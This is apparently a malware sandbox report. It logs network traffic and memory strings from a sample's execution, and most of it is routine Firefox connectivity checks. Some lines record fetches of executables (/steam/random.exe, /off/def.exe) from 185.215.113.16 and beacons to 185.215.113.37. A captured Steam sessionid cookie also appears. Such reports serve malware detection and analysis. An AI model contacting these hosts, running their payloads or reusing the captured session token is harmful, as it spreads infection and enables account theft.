Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'Should setting it as the default PDF handler only replace existing PDF handlers that are browsers, and not other PDF handlers such as Acrobat Reader or Nitro PDF." returned undefined. To ignore an action, you must explicitly return the previous state. If you want this reducer to hold no value, you can return null instead of undefined.[{incognito:null, tabId:null, types:["image"], urls:["https://smartblock.firefox.etp/facebook.svg", "https://smartblock.firefox.etp/play.svg"], windowId:null}, ["blocking"]]DELETE FROM moz_places WHERE id IN ( equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedUpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts.https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=en-US&feed_variant=default_spocs_off equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation. equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation. equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://connect.facebook.net/*/sdk.js**://connect.facebook.net/*/all.js**://www.google-analytics.com/analytics.js**://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js**://*.imgur.com/js/vendor.*.bundle.js*://web-assets.toggl.com/app/assets/scripts/*.js*://www.everestjs.net/static/st.v3.js**://www.google-analytics.com/plugins/ua/ec.js*://ssl.google-analytics.com/ga.jsFileUtils_closeAtomicFileOutputStreamhttps://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svgresource://gre/modules/addons/XPIProvider.jsm*://track.adform.net/serving/scripts/trackpoint/*://auth.9c9media.ca/auth/main.js*://*.imgur.io/js/vendor.*.bundle.js*://s0.2mdn.net/instream/html5/ima3.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.googletagservices.com/tag/js/gpt.js*webcompat-reporter@mozilla.org.xpi*://cdn.branch.io/branch-latest.min.js*webcompat-reporter%40mozilla.org:1.5.1*://www.rva311.com/static/js/main.*.chunk.js*://pub.doubleverify.com/signals/pub.js*FileUtils_closeSafeFileOutputStream*://c.amazon-adsystem.com/aax2/apstag.jsresource://gre/modules/FileUtils.sys.mjs*://static.chartbeat.com/js/chartbeat.js*://static.chartbeat.com/js/chartbeat_video.js*://static.criteo.net/js/ld/publishertag.js*://libs.coremetrics.com/eluminate.js*://s.webtrends.com/js/webtrends.min.jspruneAttachments/</allRecords</request.onerror equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://securepubads.g.doubleclick.net/tag/js/gpt.js**://www.gstatic.com/firebasejs/*/firebase-messaging.js*https://www.amazon.com/exec/obidos/external-search/**://id.rambler.ru/rambler-id-helper/auth_events.js*://media.richrelevance.com/rrserver/js/1.2/p13n.jshttps://static.adsafeprotected.com/firefox-etp-js*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js**://securepubads.g.doubleclick.net/gampad/*ad-blk*https://static.adsafeprotected.com/firefox-etp-pixel*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*C:\Program Files\Mozilla Firefox\browser\featurescolor-mix(in srgb, currentColor 14%, transparent)linear-gradient(90deg, #9059FF 0%, #FF4AA2 52.08%, #FFBD4F 100%)resource://services-settings/remote-settings.sys.mjs equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3096434663.0000025509328000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A0A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3114655458.000002550A388000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3114655458.000002550A3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2126652942.0000000000D05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.ak equals www.youtube.com (Youtube)
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=3e9e77b20f77ca8f0dc8d586; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 17:30:29 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE equals www.facebook.com (Facebook)
